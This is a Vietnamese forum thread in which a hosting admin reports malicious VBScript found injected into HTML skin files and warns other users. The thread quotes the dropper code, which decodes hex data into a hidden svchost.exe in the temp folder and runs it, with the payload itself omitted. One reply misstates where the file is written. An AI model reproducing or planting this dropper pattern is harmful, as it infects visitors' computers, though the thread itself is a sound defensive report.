Phát hiện virus cắm vào skin

Thảo luận trong 'Reports & Fix Bug' bắt đầu bởi Lightness, 2/8/13.

1votes
5/5, 1 vote

  1. Lightness

    Lightness Imma Superman

    Bài viết:
    1,021
    Likes :
    772
    Hôm nay ngồi quét virus từng account trên rsl. Thì phát hiện cái này ở 1 account.

    Ảnh chụp màn hình_2013-08-02_160253

    Lập tức kiểm tra những file html đó thì nó chứa đoạn mã thế này.

    Mã:
     <SCRIPT Language=VBScript><!--
    DropFileName = "svchost.exe"
    WriteData =
    "Đoạn này đc mã hóa nên ko copy vào"
    "
    Set FSO = CreateObject("Scripting.FileSystemObject")
    DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
    If FSO.FileExists(DropPath)=False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)
    For i = 1 To Len(WriteData) Step 2
    FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
    Next
    FileObj.Close
    End If
    Set WSHshell = CreateObject("WScript.Shell")
    WSHshell.Run DropPath, 0
    //--></SCRIPT>
    Mình ko biết tác hại của nó như thế nào, nhưng khi mở file đó bằng trình duyệt thì trình virus báo teng teng =.= Mọi người nên cẩn thận nhé :)
     
    Đang tải...
  2. ITCAnhDuy

    ITCAnhDuy Member

    Bài viết:
    423
    Likes :
    142
    Tốt nhất scan source trươc khi sài :D
     
  3. svxf

    svxf New Member

    Bài viết:
    25
    Likes :
    7
    Tác hại là tạo file Windows\System32\svchost.exe với nội dung bạn đã remove. Chắc dùng IE may ra dính.
     
  4. Bvn.vn

    Bvn.vn Active Member

    Bài viết:
    1,832
    Likes :
    401
    Một phát hiện làm vxf buồn
     
  5. Lightness

    Lightness Imma Superman

    Bài viết:
    1,021
    Likes :
    772
    Mình dùng ff mở file html thì nó vẫn hiện bình thường. Nhưng trình virus báo có virus.
     
  6. thuatdl

    thuatdl Member

    Bài viết:
    672
    Likes :
    182
    Tưởng gì, virus này mình biết lâu roài mà ;))
    Nó tự động bị chặn lại giống như chặn spyware ấy :D
    Nói chung không gây ảnh hưởng gì tới dữ liệu của máy tính cả, chỉ làm tốn thêm ít tài nguyên thôi :D
     
    Fox Of Dark thích bài này.
  7. Fox Of Dark

    Fox Of Dark Oáp.... Mấy ngày nay thức trễ

    Bài viết:
    1,102
    Likes :
    316
    Bác bác, chừng nào em ra Đà lạt bác đón em dc ko :D
    P/s: Cái virus này là em rất sợ, máy em bị dính hàng là nó chạy lần trăm task svhost.exe :((
     
  8. Lightness

    Lightness Imma Superman

    Bài viết:
    1,021
    Likes :
    772
    Bạn biết nhưng người khác chưa biết, trong đó có tui :(
     
  9. thuatdl

    thuatdl Member

    Bài viết:
    672
    Likes :
    182
    Mình đã kiểm tra, con svhost trên file html đó và con svhost trên máy tính nó khác nhau ;))
     
  10. Fox Of Dark

    Fox Of Dark Oáp.... Mấy ngày nay thức trễ

    Bài viết:
    1,102
    Likes :
    316
    ý là nó chạy có ó đó
     
  11. Lightness

    Lightness Imma Superman

    Bài viết:
    1,021
    Likes :
    772
    Khác ntn bác :-?
     
  12. thuatdl

    thuatdl Member

    Bài viết:
    672
    Likes :
    182
    Đợi đêm rảnh mình đăng bài hướng dẫn diệt svhost tự động trên máy tính :D
     
  13. Lightness

    Lightness Imma Superman

    Bài viết:
    1,021
    Likes :
    772
    Tác hại của 2 cái nó như nhau ko bác :-?
     
  14. thuatdl

    thuatdl Member

    Bài viết:
    672
    Likes :
    182
    Khác nhau chứ :D
    Mà thôi, đưa cái diệt tự động lên nguy hiểm cho máy tính, lỡ nó quyét nhầm cái svhost của máy thì cài win lại luon ;))
    Lên google tìm cái diệt thủ công cho an toàn, mất khoảng 15p.
     
  15. svxf

    svxf New Member

    Bài viết:
    25
    Likes :
    7
    Haizz. Tất nhiên là khác nhau rồi. svchost là file hệ thống của Windows. Từ xưa tới nay có cả trăm con virus dùng cái tên này hòng qua mặt người sử dụng có ít hiểu biết về thống. Chỉ khác là nó ở các thư mục khác nhau rồi.
     
    thuatdl thích bài này.
  16. f7nguyen

    f7nguyen New Member

    Bài viết:
    71
    Likes :
    6
    :( là site mình mà
     
  17. Lightness

    Lightness Imma Superman

    Bài viết:
    1,021
    Likes :
    772
    Vâng ! Hôm qua mình đi quét từng user thì phát hiện có virus ở tên miền của bạn. Mình đã xóa và tạm ngưng host chờ bạn online giải quyết :)
     
    f7nguyen thích bài này.
comments powered by Disqus

Chia sẻ trang này

Đang tải...